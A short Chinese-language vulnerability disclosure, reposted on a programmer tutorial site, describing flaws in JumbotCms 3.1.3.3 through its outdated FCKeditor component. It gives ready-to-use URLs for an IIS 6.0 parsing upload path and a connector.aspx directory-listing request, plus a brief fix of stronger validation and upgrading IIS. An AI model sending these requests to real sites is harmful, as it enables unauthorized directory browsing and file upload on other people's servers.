好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

将博CMS(JumbotCms) 3.1.3.3 漏洞及修复 - 网站安全 -

由于工作关系检测某站的时候发现的他的URL比较特别 有个cmsfile的目录 ;扫了下目录 发现有fck 因为版本比较低,可以遍历目录

百度了一下没有人发,就发一下吧 比较低级的 漏洞

主要是FCKeditor的漏洞 版本忘记看了。。。。

程序名称:将博CMS通用版 JumbotCms

利用方式:

利用IIS6.0解析漏洞

http://www.xxx.com/cmsfile/fckeditor/editor/filemanager/browser/default/connectors/test.htm

遍历目录漏洞

http://www.2cto.com /cmsfile/FCKeditor/editor/filemanager/browser/default/connectors/ asp x/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=

不要拍砖,看客全当笑话

 

 

Powered by JumbotCms 版本:3.1.3.3 www.2cto.com提供修复: 加强验证,升级iis7 作者 90sec

查看更多关于将博CMS(JumbotCms) 3.1.3.3 漏洞及修复 - 网站安全 -的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12232
  阅读:57次

上一篇: 搜房网一些旧程序含多处SQL注入+1路径泄漏 - 网站

下一篇:新浪轻博客存储型XSS - 网站安全 - 自学php

相关资讯